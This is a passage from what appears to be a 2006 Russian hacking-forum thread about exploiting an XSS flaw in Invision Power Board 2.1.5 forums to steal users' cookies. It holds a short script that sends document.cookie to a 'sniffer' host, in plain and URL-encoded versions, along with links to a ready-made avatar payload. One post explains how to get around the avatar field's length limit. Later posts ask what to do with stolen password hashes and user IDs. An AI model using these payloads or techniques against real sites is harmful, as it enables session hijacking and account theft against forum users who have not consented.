Форумы Invision 2.1.5 Xss

Discussion in 'Уязвимости CMS/форумов' started by sexxx, 9 Apr 2006.

  1. BUTUZ

    BUTUZ New Member

    Joined:
    26 Jan 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    не проходит этот скрипт
    HTML:
    <script>
    img = new Image();
    img.src = "http://адресс_снифера?"+document.cookie;
    </script>

    форум http://no-links.com/
     
    #41 BUTUZ, 28 Apr 2006
    Last edited by a moderator: 21 May 2006
  2. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Я же объяснил что работает только почему то на локалке
     
    2 people like this.
  3. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Он полюбому не пройдет... Читай весь топик! И внимательней!
     
    #43 CinerX, 29 Apr 2006
    Last edited by a moderator: 21 May 2006
  4. BUTUZ

    BUTUZ New Member

    Joined:
    26 Jan 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0

    <script>
    img%20=%20new%20Image()%3B
    img.src%20=%20%22http://адрес?%22%3F+document.cookie%3B
    </script>

    сорри, забыл перекодировать но и такое тож не прохордит
     
  5. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Этот код все равно не сработает. Т.к. ты не зашифровал еще много чего...

    Вот мой рабочий
    Если IPB 2.1.4 то вот:
    http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt
    Если IPB 2.1.5 то ставь как аватару, предварительно убрав
     
  6. BUTUZ

    BUTUZ New Member

    Joined:
    26 Jan 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    эт как как аватару???
     
  7. Sanyk36

    Sanyk36 New Member

    Joined:
    20 Apr 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  8. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Ввобще-то я в этой теме уже выкладывал видео на примере DamageLab:
    _http://dreamshell.h16.ru/hack/damagelab.rar
     
  9. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    А как чтобы на снифер отсылало зделать, тамж ведь ограничение стоит на длину...
     
  10. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    все просто...заходишь в свой профиль....--> сменить аватарку.....сохраняешь эту страницу у себя на компе....(файл сохранить как....)....открываешь эту страницу блокнотом....ближе к концу находишь надпись (по-русски) "Введите ссылку на файл Вашего аватара".....ниже видишь строчку.....maxLength=80.....вместо 80 делаешь 300, например, maxLength=300.....и сохраняешь файл....открываешь броузером и теперь у тебя стоит ограничение на 300 символов...

    для прописи кода тебе хватит сполна....:)
     
  11. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
  12. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    может вам еще и как сниффер написать? =d
     
  13. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Эта же Xss в аватаре работает и в Ipb 2.1.6 =)))
     
  14. Fer

    Fer New Member

    Joined:
    13 May 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте,

    Принцип работы Xss через аватар понял. Но возникло два вопроса:
    1. Как правильно написать подходящий под конкретный форум Xss?
    2. После получения алерта как дальше быть? То есть интересует написание снифера и запуск скрипта.
    Буду рад, если поделитесь линками на статьи.
    Спасибо
     
  15. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
  16. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    Чем она хорошая? Ничего интересного ...
     
    _________________________
  17. FithShist

    FithShist New Member

    Joined:
    26 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    давай для пущей радости и сниффер ;-)
     
  18. Danix

    Danix New Member

    Joined:
    16 May 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос: сделал все с авой, получил хэш код, айди юзверя (вообшем вся инфа на снифере), далее что? =/
     
  19. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1

    че та не работает ;( , как проверял?
     
    #59 Dimazzz, 21 May 2006
    Last edited: 21 May 2006
  20. K.e.H

    K.e.H New Member

    Joined:
    6 Aug 2005
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    І у меня не пашет